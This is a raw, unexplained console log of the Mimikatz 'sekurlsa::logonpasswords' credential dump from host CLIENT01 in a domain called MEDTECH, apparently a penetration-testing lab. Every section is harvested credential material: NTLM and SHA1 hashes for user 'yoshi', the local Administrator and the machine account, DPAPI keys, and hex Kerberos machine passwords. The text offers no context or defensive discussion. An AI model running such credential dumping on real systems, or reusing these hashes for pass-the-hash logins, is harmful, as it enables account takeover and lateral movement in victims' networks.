mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 2822345 (00000000:002b10c9)
Session           : RemoteInteractive from 2
User Name         : yoshi
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 4/29/2025 8:27:58 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1110
        msv :
         [00000003] Primary
         * Username : yoshi
         * Domain   : MEDTECH
         * NTLM     : fdf36048c1cf88f5630381c5e38feb8e
         * SHA1     : 46d778aa60c13155094d085faef70a1f92442773
         * DPAPI    : 3428d1f5289eb8cbec90bd5f761f4666
        tspkg :
        wdigest :
         * Username : yoshi
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : yoshi
         * Domain   : MEDTECH.COM
         * Password : (null)
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 2822185 (00000000:002b1029)
Session           : RemoteInteractive from 2
User Name         : yoshi
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 4/29/2025 8:27:58 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1110
        msv :
         [00000003] Primary
         * Username : yoshi
         * Domain   : MEDTECH
         * NTLM     : fdf36048c1cf88f5630381c5e38feb8e
         * SHA1     : 46d778aa60c13155094d085faef70a1f92442773
         * DPAPI    : 3428d1f5289eb8cbec90bd5f761f4666
        tspkg :
        wdigest :
         * Username : yoshi
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : yoshi
         * Domain   : MEDTECH.COM
         * Password : (null)
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 2805631 (00000000:002acf7f)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/29/2025 8:27:58 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 2805608 (00000000:002acf68)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/29/2025 8:27:58 AM
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 2804032 (00000000:002ac940)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/29/2025 8:27:58 AM
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 685042 (00000000:000a73f2)
Session           : Batch from 0
User Name         : Administrator
Domain            : CLIENT01
Logon Server      : CLIENT01
Logon Time        : 4/24/2025 12:13:36 AM
SID               : S-1-5-21-1321257335-4087355848-2054211087-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CLIENT01
         * NTLM     : f26c0186c8ffcceb01fd2d7549e7ac1f
         * SHA1     : bfb1b13f2063cf3fe1e07cdd30c87188160e472f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : CLIENT01
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : CLIENT01
         * Password : (null)
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:21 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 77909 (00000000:00013055)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 737ca072bb549618f1522cec1bfe2b86
         * SHA1     : 0468937e79e5f39ca0893db90423e2c5414673a8
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : 87 77 a6 62 c5 09 5d 75 a8 0c 09 57 ce 7b 1b dc 35 2e b4 a4 89 ff b0 6b 98 4b ba ad 76 2e dc e1 1b 82 d3 2f 52 3e 30 c9 50 97 d2 dc 7d 50 ec 54 36 96 aa 91 c3 83 7d 6a dc 1f 40 ed 06 60 c4 61 ce d7 e2 81 ac 60 26 68 9c d3 1b 6c 74 6c 81 de 55 25 57 db 89 2a 7e 5f ab 54 c0 49 d3 ac 15 82 42 b8 1d cf 80 b1 54 84 1b b8 b0 d5 a4 c9 51 c0 7d 36 d0 97 48 f3 00 55 8f 0f b2 b3 21 5a 06 30 2b 4f ee 1e 73 35 76 96 4a fe 2f e3 4e 86 f3 e4 27 3a ae 6c 90 2b 1d 8c 9a 7e a2 ab 12 5c 5b ba f4 bf 22 ef cf 28 5e e5 22 5b 80 0d a4 e9 f4 14 2f b1 ca 17 18 31 51 9e af 9b eb 0c 58 f3 c5 90 da c4 dc 0e c4 f1 25 74 71 11 83 a6 d4 44 b9 a8 6c 29 0e c8 1c 7f 42 7c a8 79 db f4 5c 79 3f 25 58 46 57 c3 40 7a 11 9f 4f ac 93 96 f3 b5 75 94
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 77891 (00000000:00013043)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CLIENT01$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : client01$
         * Domain   : MEDTECH.COM
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 47957 (00000000:0000bb55)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 47938 (00000000:0000bb42)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : CLIENT01$
         * Domain   : medtech.com
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 45806 (00000000:0000b2ee)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               :
        msv :
         [00000003] Primary
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * NTLM     : 1842bbf7a7b0a258182fcc05c8d5356d
         * SHA1     : a6ace87f3e4f0fd7e35790d104485974961ebd86
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :       KO

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CLIENT01$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 4/24/2025 12:11:20 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : CLIENT01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : client01$
         * Domain   : MEDTECH.COM
         * Password : ea 67 1f 33 59 db ac df 84 f2 50 d7 1d 34 fa e9 7a d4 2b 0a 89 3c 76 8c 17 df 59 76 da 7b f7 55 a2 6b cb 50 da cc a8 1f be e8 e6 1f a9 1d 5b c4 de 7b 19 ca b7 70 ca de 85 5e ca d9 0b d7 65 57 52 fd e1 db a1 84 9e 75 a7 e1 66 06 f2 c2 db ee 42 4b 41 ad 89 05 9c ef e3 7e 3f 15 cd e8 18 b4 14 27 cd bc 19 df 57 fc a8 7a d5 b5 c8 21 b0 3a e5 ef f0 e5 73 d9 7b 38 be 12 c0 0f da ac 1d bb 80 4b 7a 39 00 47 92 8c ed 25 ef b0 ba 35 34 fd 85 95 16 b4 f9 5a f7 4d b1 76 13 74 fa 06 c9 59 b4 26 3e 96 ea c2 ec 5a 7e 87 32 68 4f 0a b6 aa 4d f4 5b e6 fe 6d 1f f7 49 7f 50 dc a4 62 31 ba 16 e2 f5 b8 ea 00 25 e0 03 33 c9 14 f6 e8 b7 02 d5 1f 39 82 1d 74 4e e3 35 ce 19 34 5e 73 3c 1d 6c 08 b3 0e 0b fa a6 43 73 48 70 07 64 db 77 f2
        ssp :
        credman :
        cloudap :       KO